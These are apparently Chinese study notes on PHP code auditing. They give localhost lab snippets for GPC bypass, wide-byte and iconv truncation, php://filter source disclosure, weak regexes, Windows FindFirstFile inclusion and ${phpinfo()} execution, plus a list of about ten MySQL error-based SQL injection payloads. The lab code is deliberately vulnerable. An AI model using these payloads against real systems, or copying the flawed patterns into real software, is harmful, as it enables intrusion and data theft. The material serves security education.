You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

17 KiB

转义绕过、字符串常见的安全问题、PHP输入输出流、FUZZ挖掘漏洞以及正则表达式不严谨。

1. GPC等转义的绕过

  • GPC会自动把提交上去的单引号等敏感字符给转义掉
  • 在PHP5之后用$_SERVER取到的header字段不受GPC影响
  • 在header注入里面最常见的是user-agent 、referer 以及client-ip/x-forward-for
  • $_FILES变量也不受GPC保护测试代码
<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "不受GPC保护的$_SERVER和$_FILES"."<br />";
	
	echo 'GPC目前的值为 '.get_magic_quotes_gpc();
	echo '<br />client-ip= ' . $_SERVER["HTTP_CLIENT_IP"];
	echo '<br />$_GET[a]= ' . $_GET[a];	
?>

image-20251030143432746

然后在浏览器中访问:

http://localhost/2020CodeAudit/c8/8-1-1-gpc-server.php?a=1'

看看发送包:

image-20251030143549509

右键点中这个记录Send to repeater

image-20251030143757610

添加 http头发送Send

client-ip: a'

最后结果显示$_SERVER 中的环境变量并没有进行特殊字符的转义。

1.1. 编码转换问题

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<?php
    echo "mb_convert_encoding函数使用举例"."<br />";
	
	$sql = "where id = '" . urldecode("-1%df%5c' -- ") . "'";
	print_r(mb_convert_encoding($sql,"UTF-8","GBK"));//编码转换函数
	echo '<br />';
	print_r($sql);
?>
http://localhost/2020CodeAudit/c8/8-1-2-covert-encode.php

结果:

mb_convert_encoding函数使用举例
where id = '-1運' -- '
where id = '-1<>\' -- '

这就是以前讲的宽字节注入的漏洞,只不过这里使用 mb_convert_encoding 函数把UTF8转码到 GBK 进行模拟。可以看看源文件的编码是UTF8。

书上 144 页有个例子

2. 神奇的字符串

2.1. 字符处理函数报错信息泄露

  • 要显示错误信息需要打开在PHP配置文件 php.ini 中设置 display_errors = on 或者在代码中加入error_reporting()函数
  • 其中最常用的是E_ALL、E_WARNING、E_NOTICE
  • E_ALL代表提示所有问题, E_WARNING代表显示错误信息E_NOTICE则是显示基础提示信息。

trim ()函数对用户名等值去掉两边的空格,这时候如果我们传入的用户名参数是一个数组,则程序就会报错,测试代码:

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	error_reporting(E_ALL);
	echo "利用报错信息举例:"."<br />";
	
	echo trim($_GET['a']);//当输入?a[]=test时程序报错	
?>
http://localhost/2020CodeAudit/c8/8-2-1-trim-error.php?a[]=test

结果:

利用报错信息举例:

Notice: Array to string conversion in C:\autit\www\2020CodeAudit\C8\8-2-1-trim-error.php on line 6
Array

2.2. iconv函数字符编码转换截断

  • iconv()函数用来做字符编码转换;
  • 比如从UTF-8转换到GBK字符集的编码转换总会存在一定的差异性导致部分编码不能被成功转换也就是出现常说的乱码。
  • 在使用iconv()函数转码的时候,当遇到不能处理的字符串则后续字符串会不被处理
<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "iconv()函数使用举例:"."<br />";
	//chr() 函数从指定的 ASCII 值返回字符。
	/*
	ASCII码
	数字 32126 分配给了能在键盘上找到的字符当您查看或打印文档时就会出现。注十进制32代表空格 ,十进制数字 127 代表 DELETE 命令。
	ASCII 表上的数字 031 分配给了控制字符,用于控制像打印机等一些外围设备
	扩展的 ASCII 包含 ASCII 中已有的 128 个字符,又增加了 128 个字符,总共是 256 个。
	*/
	$a = '1' . chr(130) . '2';
	echo $a;
	echo '<br />';
	echo iconv("UTF-8","gbk",$a);	
?>
http://localhost/2020CodeAudit/c8/8-2-2-2-iconv.php

结果:

iconv()函数使用举例:
1<>2
1

通过这里例子可以看到转换后的字符串被切断了。149页的漏洞就是利用iconv这个特点可以上传任意类型的文件。

3. php://输入输出流

  • PHP提供了php://的协议允许访问 PHP的输入输出流、标准输入输出和错误描述符
  • 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

151 页:

3.1. php://input

  • 可以访问请求的原始数据的只读流。
  • 即可以直接读取到POST没有经过解析的原始数据, 但是php://input不能以获取“multipart/form-data”方式提交的数据。
<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "php://input使用举例"."<br />";
	
	echo file_get_contents("php://input");	
?>
http://localhost/2020CodeAudit/c8/8-3-phpinput.php

image-20251030153450203

前面的例子中可以通过该方式注入PHP代码。

3.2. php://output和php://filter

  • php://output将流数据输出
  • php://filter是一个文件操作的协议可以对磁盘中的文件进行读写操作效果类似 于readfile()、file()和file_get_contents()
名 称 描 述
resource=<要过滤的数据流> 该参数是必须的。它指定了你要筛选过滤的数据流
read=<读链的筛选列表> 该参数可选,可以设定一个或多个过滤器名称,以管道符(|) 分隔
write=<写链的筛选列表> 该参数可选,可以设定一个或多个过滤器名称,以管道符(|) 分隔
<;两个链的筛选列表> 任何没有以read=或write=作前缀的筛选器列表会视情况应 用于读或写链

3.2.1. php://filter写文件

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "php://filter使用举例"."<br />";
	//ROT13是一种简易的替换式密码。
	file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello world123");	
?>
http://localhost/2020CodeAudit/c8/8-3-phpfilter-1.php

file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello world123");会向脚本同目录下写入“example.txt”文件内容为rot13编码过的“Hello World123”

Uryyb jbeyq123

3.2.2. php://filter读文件

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "php://filter使用举例2"."<br />";
	//输入?f=php://filter/convert.base64-encode/resource=1.php
	include($_GET['f']);
?>
http://localhost/2020CodeAudit/c8/8-3-phpfilter-2.php?f=php://filter/convert.base64-encode/resource=1.php

结果:

php://filter使用举例2
PD9waHANCglwaHBpbmZvKCk7DQo/Pg==

相当于使用 base64 对 1.php 文件进行编码,其结果被包含到输出流中。

如果是:

http://localhost/2020CodeAudit/c8/8-3-phpfilter-2.php?f=1.php

就会包含1.php中的内容如果有php代码就会执行。

4. PHP代码解析标签

PHP有几种解析标签的写法来标识PHP代码

  • 脚本标签:<script language="php">...< /script>从PHP7开始不支持该写法
  • 短标签:< ? ... ?> 需要在php.ini中设置short_open_tags=On
  • asp标签<% ...%> 需要在php.ini中设置asp_tags=On
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>PHP代码解析标签使用举例</title>
</head>
<body>
<!--<? phpinfo(); ?>-->
<!--<script language="php">phpinfo()</script>-->
<% phpinfo(); %>

</body>
</html>
http://localhost/2020CodeAudit/c8/8-4-php-tag.php

请查看 php 配置。

5. fuzz漏洞发现

  • fuzz指的是对特定目标的模糊测试
  • 当我们用Office Word打开doc文档的时候Word软件会按照指定的格式读取文件的内容
  • 如果文件格式出现异常字符Word无法解析而又没有提前捕捉到这种类型的错误则有可能引发Word程序崩溃这就是一个bug
  • 这时候我们就可以通过工具生成大量带有异常格式或者字符的doc文档然后调用Word程序去读取尝试发现更多的bug。

书上 154 页

6. 不严谨的正则表达式

正则表达式也跟程序语言一样,规则写得不严谨,就会导致安全问题产生

6.1. 没有使用^和$限定匹配开始/结束位置

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo '不严谨的正则表达式,没有使用^和$限定开始结束位置:'."<br />";
	
	// $ip = $_SERVER['HTTP_CLIENT_IP'];
	// $ip = urldecode('127.0.0.1');
	$ip = urldecode('127.0.0.1zzz');
	echo $ip."<br />";
	//if(preg_match('/\d+\.\d+\.\d+\.\d+/',$ip)){
		
	if(preg_match('/^\d+\.\d+\.\d+\.\d+$/',$ip)){
		echo $ip;
	}	
?>
http://localhost/2020CodeAudit/c8/8-6-pregrematch-1.php

'/\d+\.\d+\.\d+\.\d+/'没有限定开始和结束因此只要包含了合法IP地址的字符串都可以通过验证'/^\d+\.\d+\.\d+\.\d+$/'规定了开始和结束必须为数字。

6.2. 特殊字符未转义

在正则表达式里,所有能被正则表达式引擎解析的字符都算是特殊字符,而在匹配这些字符的原字符时需要使用反斜杠(\)来进行转义,如果不进行转义,像样英文句号(.)则可用来表示任何字符,存在安全隐患

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	echo "不严谨的正则表达式,特殊字符未转义:"."<br />";
	
	$filename = urldecode('xxx.php%00jpg');
	if(preg_match('/.(jpg|gif|png|bmp)$/i',$filename)){
		file_put_contents($filename,'aaa111');
	}
	else{
		echo '不允许的文件扩展名';
	}	
?>
http://localhost/2020CodeAudit/c8/8-6-pregrematch-2.php

7. 十余种MySQL报错注入

  • SQL Server利用的是convert()和cast()函数
  • MySQL的报错 SQL注入方式更多不过多数人以为只有三种floor()、updatexml()以及 extractvalue()这三个函数,
  • 但实际上还有很多个函数都会导致MySQL报错并且显示出数据它们分别是
    • GeometryCollection(),
    • polygon()、
    • GTID_SUBSET()、
    • multipoint()、
    • multilinestring()、
    • multipolygon()、
    • LINESTRING()、
    • exp()
<?php
/*
id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x)a)

id=1 and (extractvalue(1,concat(0x5c,(select user()))))

id=1 and (updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

id=1 and GeometryCollection((select * from(select * from(select user())a)b))

id=1 and polygon((select * from(select * from(select user())a)b))

id=1 and multipoint((select * from(select * from(select user())a)b))

id=1 and multilinestring((select * from(select * from(select user())a)b))

id=1 and multipolygon((select * from(select * from(select user())a)b))

id=1 and linestring((select * from(select * from(select user())a)b))

id=1 and EXP(~(select * from(select user())a))

*/
	$servername = "localhost";
	$username = "root";
	$password = "root";
	$dbname = "test";
	// 创建连接
	$conn = new mysqli($servername, $username, $password, $dbname);
	// 检测连接
	if ($conn->connect_error) {
		die("连接失败: " . $conn->connect_error);
	} 

	$uid = $_GET['id'];
	$sql = "SELECT * FROM userinfo where id=$uid";
    $result = $conn->query($sql);

	print_r('当前SQL语句' . $sql . '<br />结果:');
	
	// var_dump($result);
	if ($result->num_rows > 0) {//返回结果集中行的数量。
    // 输出每行数据
		while($row = $result->fetch_assoc()) {//从结果集中取得一行作为关联数组。
			var_dump($row);
    }
	} else {
		echo mysqli_error($conn);
	}
	//$result->free();
	$conn->close();
?>
http://localhost/2020CodeAudit/c8/8-7-SQL.php? id=1 and (updatexml(1, concat(0x5e24,(select user()),0x5e24),1))

结果:

Warning: mysqli::mysqli() [mysqli.mysqli]: (28000/1045): Access denied for user 'root'@'localhost' (using password: YES) in C:\autit\www\2020CodeAudit\C8\8-7-SQL.php on line 29
连接失败: Access denied for user 'root'@'localhost' (using password: YES)

注意mysql版本不同报错可能不同。

8. Windows FindFirstFile 利用

  • 在Windows下时只需要知道文件所在目录然后利用Windows的特性就可以访问到文件
  • 这是因为 Windows在搜索文件的时候使用到了 FindFirstFile这一个winapi函数
  • 该函数到一个文件夹(包括子文件夹)去搜索指定文件。
<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	
	echo "Windows FindFirstFile函数利用举例"."<br />";
	include($_GET['file']);	
?>

12.txt 文件

<?php
    phpinfo();
?>
http://localhost/2020CodeAudit/c8/8-8-findfirstfile.php?file=12.txt
http://localhost/2020CodeAudit/c8/8-8-findfirstfile.php?file=1<.txt
http://localhost/2020CodeAudit/c8/8-8-findfirstfile.php?file=1<<

很多函数都有这个特性162 页。

函 数 功 能 函 数 功 能
include() 包含文件 file_put_contents() 写入文件
include_once() 包含文件 mkdir() 创建文件夹
require() 包含文件 tempnam() 创建文件
require_once() 包含文件 touch() 创建文件
fopen() 打开文件 move_uploaded_file() 移动文件
ziparchive: :open() 打开文件 opendir() 文件夹操作
copy() 复制文件 readdir() 文件夹操作
f ile_get_contents() 读取文件 rewinddir() 文件夹操作
parse_ini_file() 读取文件 closedir() 文件夹操作
readfile() 读取文件

9. PHP可变变量

  • 部分PHP应用在写配置文件或者使用preg_replace()函数第二个参数赋值变量时,会用到双引号(")来代表string类型给变量赋值
  • 在PHP语言中单引号和双引号是有区别的单引号代表纯字符串而双引号则是会解析中间的变量所以当使用双引号时会存在代码执行漏洞
<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	error_reporting(E_ALL);
	echo "PHP可变变量举例"."<br />";
	
	$a = 'seay';
	$$a = '123';
	echo $seay;	
?>

部分PHP应用在写配置文件或者使用preg_replace()函数第二个参数赋值变量时,会用到双引号(")来代表string类型给变量赋值

在PHP语言中单引号和双引号是有区别的单引号代表纯字符串而双引号则是会解析中间的变量所以当使用双引号时会存在代码执行漏洞。

“@”符号是必须存在的除了@符号还有其他的写法也一样可以。

<?php
    header("Content-Type:text/html;charset=utf-8");//PHP显示中文
	error_reporting(E_ALL);
	echo "PHP可变变量-phpinfo的用法举例"."<br />";
	//以下八条语句都可以执行phpinfo
	//$a = "${@phpinfo()}";
	//$a = "${ phpinfo()}";				// 空格
	 $a = "${	phpinfo()}";			// TAB
	//$a = "${/**/phpinfo()}";			
	// $a = "${							// 分行,回车
	// phpinfo()}";
	//$a = "${+phpinfo()}";
	// $a = "${-phpinfo()}";
	// $a = "${!phpinfo()}";	
?>
http://localhost/2020CodeAudit/c8/8-9-phpinfo.php